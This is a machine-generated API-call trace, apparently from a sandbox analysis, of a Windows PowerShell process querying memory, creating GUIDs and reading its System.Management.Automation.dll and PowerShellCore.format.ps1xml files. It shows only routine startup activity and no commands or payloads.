	[0383.501] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.502] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.502] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.502] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.502] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.502] VirtualQuery (in: lpAddress=0x24b520, lpBuffer=0x24c3e0, dwLength=0x30 | out: lpBuffer=0x24c3e0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.502] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.502] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.502] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.502] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.503] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xfc7d8f0, Data2=0x30c6, Data3=0x488d, Data4=([0]=0xa8, [1]=0x36, [2]=0x5b, [3]=0x1c, [4]=0xe7, [5]=0xf, [6]=0x69, [7]=0xc4))) returned 0x0
	[0383.503] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x59eaef8e, Data2=0xc7ca, Data3=0x48ff, Data4=([0]=0x97, [1]=0xc9, [2]=0x98, [3]=0x9c, [4]=0x2e, [5]=0x58, [6]=0xfd, [7]=0x1c))) returned 0x0
	[0383.503] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xe39945b5, Data2=0x1ea3, Data3=0x4570, Data4=([0]=0xb2, [1]=0xfd, [2]=0x9f, [3]=0x99, [4]=0x79, [5]=0xaa, [6]=0x6, [7]=0x60))) returned 0x0
	[0383.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.504] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x5cfa7965, Data2=0x1be3, Data3=0x44ff, Data4=([0]=0xb5, [1]=0x4, [2]=0x7f, [3]=0xeb, [4]=0xa6, [5]=0xbe, [6]=0x2b, [7]=0xdb))) returned 0x0
	[0383.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.506] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xffb915e1, Data2=0xf123, Data3=0x4b26, Data4=([0]=0x8e, [1]=0x83, [2]=0xe, [3]=0xe1, [4]=0x38, [5]=0x7f, [6]=0x7, [7]=0xd6))) returned 0x0
	[0383.506] VirtualQuery (in: lpAddress=0x24b630, lpBuffer=0x24c4f0, dwLength=0x30 | out: lpBuffer=0x24c4f0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.506] VirtualQuery (in: lpAddress=0x24b6c0, lpBuffer=0x24c580, dwLength=0x30 | out: lpBuffer=0x24c580*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.506] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xc4a2c5cc, Data2=0x9b90, Data3=0x46d7, Data4=([0]=0xbc, [1]=0x98, [2]=0x83, [3]=0xe7, [4]=0xae, [5]=0x6e, [6]=0x1d, [7]=0xe4))) returned 0x0
	[0383.506] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xf64ae52b, Data2=0x1618, Data3=0x4c02, Data4=([0]=0xad, [1]=0xc6, [2]=0xe9, [3]=0x16, [4]=0x23, [5]=0x87, [6]=0x6d, [7]=0xb6))) returned 0x0
	[0383.506] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x394a49f4, Data2=0x8a93, Data3=0x451e, Data4=([0]=0x92, [1]=0x4a, [2]=0xf1, [3]=0xfe, [4]=0xd9, [5]=0xab, [6]=0x17, [7]=0x29))) returned 0x0
	[0383.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0383.507] SetErrorMode (uMode=0x1) returned 0x1
	[0383.507] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0383.507] GetFileType (hFile=0x330) returned 0x1
	[0383.507] SetErrorMode (uMode=0x1) returned 0x1
	[0383.507] GetFileType (hFile=0x330) returned 0x1
	[0383.507] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.508] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.508] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.509] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.509] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.509] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.509] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.509] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.509] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.510] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.510] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.511] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.511] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.511] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.511] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.512] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.512] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.513] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.966] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.966] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.967] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.967] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0xe67, lpOverlapped=0x0) returned 1
	[0383.967] ReadFile (in: hFile=0x330, lpBuffer=0x2ecaf7f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecaf7f*, lpNumberOfBytesRead=0x24ce18*=0x0, lpOverlapped=0x0) returned 1
	[0383.967] ReadFile (in: hFile=0x330, lpBuffer=0x2ecb9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x2ecb9b0*, lpNumberOfBytesRead=0x24ce18*=0x0, lpOverlapped=0x0) returned 1
	[0383.967] CloseHandle (hObject=0x330) returned 1
	[0383.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0383.968] SetErrorMode (uMode=0x1) returned 0x1
	[0383.968] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cdc0 | out: lpFileInformation=0x24cdc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0383.968] SetErrorMode (uMode=0x1) returned 0x1
	[0383.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
